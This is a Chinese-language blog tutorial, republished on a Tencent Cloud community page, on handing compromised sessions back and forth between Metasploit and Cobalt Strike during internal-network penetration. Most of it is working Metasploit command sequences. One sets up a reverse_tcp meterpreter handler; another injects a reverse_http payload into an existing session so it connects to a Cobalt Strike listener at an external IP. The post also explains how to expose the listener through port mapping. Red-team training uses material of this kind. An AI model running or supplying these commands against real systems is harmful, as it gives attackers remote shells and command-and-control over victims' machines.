前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >内网渗透|MSF和CobaltStrike联动

内网渗透|MSF和CobaltStrike联动

作者头像
谢公子
发布2022-01-19 19:52:18
1K0
发布2022-01-19 19:52:18
举报
文章被收录于专栏:谢公子学安全谢公子学安全

MSF和CobaltStrike联动

目录

当获取了CobaltStrike类型的session后,想派生一个MSF类型的shell

当获取了MSF类型的session后,想派生一个CobaltStrike类型的shell

当获取了CobaltStrike类型的session后,想派生一个MSF类型的shell

在MSF上的操作:

代码语言:javascript
复制
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.10.11
set lport 4444
exploit -j

在CobaltStrike上的操作

开启一个监听器Listener,HOST和PORT填我们MSF监听的地址(这里需要注意,如果我们的MSF也是在内网中的话,需要将MSF的端口映射到公网地址),这里我们将Kali的端口映射到了公网的 server.natappfree.cc:38615 (112.74.89.58:38615 )。

如果我们的公网VPS上安装了MSF的话 ,就不需要映射端口了。

这里一定要注意,创建的Listener是foreign!

然后选中计算机,右键->Spawn,选择刚刚创建的监听器MSF,然后我们的MSF即可看到成功获取了meterpreter会话

当获取了MSF类型的session后,想派生一个CobaltStrike类型的shell

注:只有meterpreter类型的session才能派生给CS

我们现在获得了一个MSF的meterpreter类型的session,session id为1

首先在CobaltStrike上开启Listener,

然后在MSF中进行如下操作

代码语言:javascript
复制
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set DisablePayloadHandler true   #默认情况下,payload_inject执行之后会在本地产生一个新的handler,由于我们已经有了一个,所以不需要在产生一个,所以这里我们设置为true
set lhost 48.94.225.140         #cobaltstrike监听的ip
set lport 14444                 #cobaltstrike监听的端口 
set session 1                   #这里是获得的session的id
exploit

这样,我们的CobaltStrike上就可以收到MSF弹回来的session了。

来源:谢公子博客

责编:Vivian

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2020-04-06,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 谢公子学安全 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档